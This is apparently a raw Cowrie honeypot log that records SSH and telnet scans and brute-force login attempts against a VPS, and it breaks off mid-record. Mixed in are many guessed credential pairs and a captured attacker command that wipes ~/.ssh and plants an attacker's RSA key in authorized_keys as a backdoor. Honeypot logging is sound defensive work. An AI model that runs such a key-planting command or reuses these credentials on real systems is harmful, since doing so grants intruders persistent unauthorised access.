{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:21:42.098984Z","src_ip":"212.227.235.229","session":"c7f5346bd0e5"}
{"eventid":"cowrie.session.closed","duration":1.3647215366363525,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:21:42.260566Z","src_ip":"146.190.103.1","session":"de3eb21dd1ba"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.103.1","src_port":58288,"dst_ip":"1.2.3.4","dst_port":23,"session":"bbee2d872c21","protocol":"telnet","message":"New connection: 146.190.103.1:58288 (1.2.3.4:23) [session: bbee2d872c21]","sensor":"my-vps","timestamp":"2025-08-31T06:21:42.441033Z"}
{"eventid":"cowrie.session.closed","duration":1.0620012283325195,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:21:43.502963Z","src_ip":"146.190.103.1","session":"bbee2d872c21"}
{"eventid":"cowrie.session.closed","duration":9.999835968017578,"message":"Connection lost after 9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:21:43.635423Z","src_ip":"3.130.96.91","session":"cb29292ec94c"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.103.1","src_port":58300,"dst_ip":"1.2.3.4","dst_port":23,"session":"44710c888065","protocol":"telnet","message":"New connection: 146.190.103.1:58300 (1.2.3.4:23) [session: 44710c888065]","sensor":"my-vps","timestamp":"2025-08-31T06:21:43.683900Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T06:21:44.275240Z","src_ip":"146.190.103.1","session":"44710c888065"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41542,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf2db09563db","protocol":"ssh","message":"New connection: 212.227.125.160:41542 (1.2.3.4:22) [session: cf2db09563db]","sensor":"my-vps","timestamp":"2025-08-31T06:21:45.138321Z"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-31T06:21:45.946839Z","src_ip":"146.190.103.1","session":"44710c888065"}
{"eventid":"cowrie.session.closed","duration":2.999711275100708,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:21:46.683527Z","src_ip":"146.190.103.1","session":"44710c888065"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.103.1","src_port":58310,"dst_ip":"1.2.3.4","dst_port":23,"session":"02bab4b145e7","protocol":"telnet","message":"New connection: 146.190.103.1:58310 (1.2.3.4:23) [session: 02bab4b145e7]","sensor":"my-vps","timestamp":"2025-08-31T06:21:46.861664Z"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"12345","message":"login attempt [tomcat/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T06:21:48.097326Z","src_ip":"212.227.235.229","session":"c7f5346bd0e5"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:21:50.008978Z","src_ip":"212.227.235.229","session":"c7f5346bd0e5"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:21:50.263647Z","src_ip":"212.227.125.160","session":"cf2db09563db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44582,"dst_ip":"1.2.3.4","dst_port":23,"session":"94ebcd1b61b2","protocol":"telnet","message":"New connection: 212.227.235.229:44582 (1.2.3.4:23) [session: 94ebcd1b61b2]","sensor":"my-vps","timestamp":"2025-08-31T06:21:50.917404Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:21:51.113737Z","src_ip":"212.227.235.229","session":"94ebcd1b61b2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:21:51.129399Z","src_ip":"212.227.235.229","session":"94ebcd1b61b2"}
{"eventid":"cowrie.session.closed","duration":4.762629508972168,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:21:51.624223Z","src_ip":"146.190.103.1","session":"02bab4b145e7"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.103.1","src_port":58904,"dst_ip":"1.2.3.4","dst_port":23,"session":"272d52889fbb","protocol":"telnet","message":"New connection: 146.190.103.1:58904 (1.2.3.4:23) [session: 272d52889fbb]","sensor":"my-vps","timestamp":"2025-08-31T06:21:51.822949Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"VnT3ch@dm1n","message":"login attempt [admin/VnT3ch@dm1n] failed","sensor":"my-vps","timestamp":"2025-08-31T06:21:53.800580Z","src_ip":"146.190.103.1","session":"272d52889fbb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58826,"dst_ip":"1.2.3.4","dst_port":22,"session":"33fc20e4fbcc","protocol":"ssh","message":"New connection: 212.227.235.229:58826 (1.2.3.4:22) [session: 33fc20e4fbcc]","sensor":"my-vps","timestamp":"2025-08-31T06:21:54.002460Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:21:54.003440Z","src_ip":"212.227.235.229","session":"33fc20e4fbcc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:21:54.260937Z","src_ip":"212.227.235.229","session":"33fc20e4fbcc"}
{"eventid":"cowrie.login.failed","username":"mostafa","password":"mostafa123","message":"login attempt [mostafa/mostafa123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:21:55.334173Z","src_ip":"212.227.235.229","session":"33fc20e4fbcc"}
{"eventid":"cowrie.session.closed","duration":4.035307168960571,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:21:55.858184Z","src_ip":"146.190.103.1","session":"272d52889fbb"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.103.1","src_port":58918,"dst_ip":"1.2.3.4","dst_port":23,"session":"188d8ad2866c","protocol":"telnet","message":"New connection: 146.190.103.1:58918 (1.2.3.4:23) [session: 188d8ad2866c]","sensor":"my-vps","timestamp":"2025-08-31T06:21:56.026905Z"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:21:56.593600Z","src_ip":"212.227.235.229","session":"33fc20e4fbcc"}
{"eventid":"cowrie.login.failed","username":"telnet","password":"telnet","message":"login attempt [telnet/telnet] failed","sensor":"my-vps","timestamp":"2025-08-31T06:21:57.227716Z","src_ip":"146.190.103.1","session":"188d8ad2866c"}
{"eventid":"cowrie.session.closed","duration":3.201637029647827,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:21:59.228431Z","src_ip":"146.190.103.1","session":"188d8ad2866c"}
{"eventid":"cowrie.session.connect","src_ip":"146.190.103.1","src_port":58932,"dst_ip":"1.2.3.4","dst_port":23,"session":"c84728fd4d7c","protocol":"telnet","message":"New connection: 146.190.103.1:58932 (1.2.3.4:23) [session: c84728fd4d7c]","sensor":"my-vps","timestamp":"2025-08-31T06:21:59.405867Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54954,"dst_ip":"1.2.3.4","dst_port":22,"session":"56bfb41fcec8","protocol":"ssh","message":"New connection: 212.227.235.229:54954 (1.2.3.4:22) [session: 56bfb41fcec8]","sensor":"my-vps","timestamp":"2025-08-31T06:21:59.575366Z"}
{"eventid":"cowrie.login.success","username":"root","password":"86981198","message":"login attempt [root/86981198] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:21:59.937617Z","src_ip":"146.190.103.1","session":"c84728fd4d7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:22:00.397394Z","src_ip":"146.190.103.1","session":"c84728fd4d7c"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-08-31T06:22:00.554293Z","src_ip":"146.190.103.1","session":"c84728fd4d7c"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123456","message":"login attempt [ftpuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:22:01.041064Z","src_ip":"212.227.125.160","session":"9d893ca15d17"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51858,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a2a9e6802f6","protocol":"ssh","message":"New connection: 212.227.125.160:51858 (1.2.3.4:22) [session: 3a2a9e6802f6]","sensor":"my-vps","timestamp":"2025-08-31T06:22:02.449662Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:22:02.709800Z","src_ip":"212.227.235.229","session":"56bfb41fcec8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:22:02.738737Z","src_ip":"212.227.235.229","session":"56bfb41fcec8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:22:02.998455Z","src_ip":"212.227.125.160","session":"3a2a9e6802f6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:22:02.999254Z","src_ip":"212.227.125.160","session":"3a2a9e6802f6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","size":454,"shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","duplicate":true,"duration":"3.0","message":"Closing TTY Log: var/lib/cowrie/tty/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:22:03.371150Z","src_ip":"146.190.103.1","session":"c84728fd4d7c"}
{"eventid":"cowrie.session.closed","duration":3.970146894454956,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:22:03.375933Z","src_ip":"146.190.103.1","session":"c84728fd4d7c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62406,"dst_ip":"1.2.3.4","dst_port":22,"session":"27264cc65bda","protocol":"ssh","message":"New connection: 212.227.235.229:62406 (1.2.3.4:22) [session: 27264cc65bda]","sensor":"my-vps","timestamp":"2025-08-31T06:22:04.507515Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:22:04.508447Z","src_ip":"212.227.235.229","session":"27264cc65bda"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:22:04.722652Z","src_ip":"212.227.235.229","session":"27264cc65bda"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"12345","message":"login attempt [tomcat/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T06:22:05.087925Z","src_ip":"212.227.125.160","session":"3a2a9e6802f6"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@123qwe","message":"login attempt [root/Admin@123qwe] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:22:05.623398Z","src_ip":"212.227.235.229","session":"27264cc65bda"}
{"eventid":"cowrie.session.closed","duration":"31.0","message":"Connection lost after 31.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:22:06.034764Z","src_ip":"212.227.125.160","session":"9d893ca15d17"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:22:06.077451Z","src_ip":"212.227.235.229","session":"27264cc65bda"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:22:06.078380Z","src_ip":"212.227.235.229","session":"27264cc65bda"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:22:06.079576Z","src_ip":"212.227.235.229","session":"27264cc65bda"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:22:06.295109Z","src_ip":"212.227.235.229","session":"27264cc65bda"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:22:06.788564Z","src_ip":"212.227.235.229","session":"27264cc65bda"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:22:06.789340Z","src_ip":"212.227.235.229","session":"27264cc65bda"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:22:06.923798Z","src_ip":"212.227.125.160","session":"3a2a9e6802f6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:22:07.007012Z","src_ip":"212.227.235.229","session":"27264cc65bda"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:22:07.007862Z","src_ip":"212.227.235.229","session":"27264cc65bda"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":36742,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a95b4fc9c66","protocol":"ssh","message":"New connection: 201.148.180.50:36742 (1.2.3.4:22) [session: 6a95b4fc9c66]","sensor":"my-vps","timestamp":"2025-08-31T06:22:07.157299Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62789,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9f6cd8f7ce4","protocol":"ssh","message":"New connection: 212.227.235.229:62789 (1.2.3.4:22) [session: a9f6cd8f7ce4]","sensor":"my-vps","timestamp":"2025-08-31T06:22:07.223357Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:22:07.225027Z","src_ip":"212.227.235.229","session":"a9f6cd8f7ce4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:22:07.442703Z","src_ip":"212.227.235.229","session":"a9f6cd8f7ce4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:22:07.992377Z","src_ip":"201.148.180.50","session":"6a95b4fc9c66"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-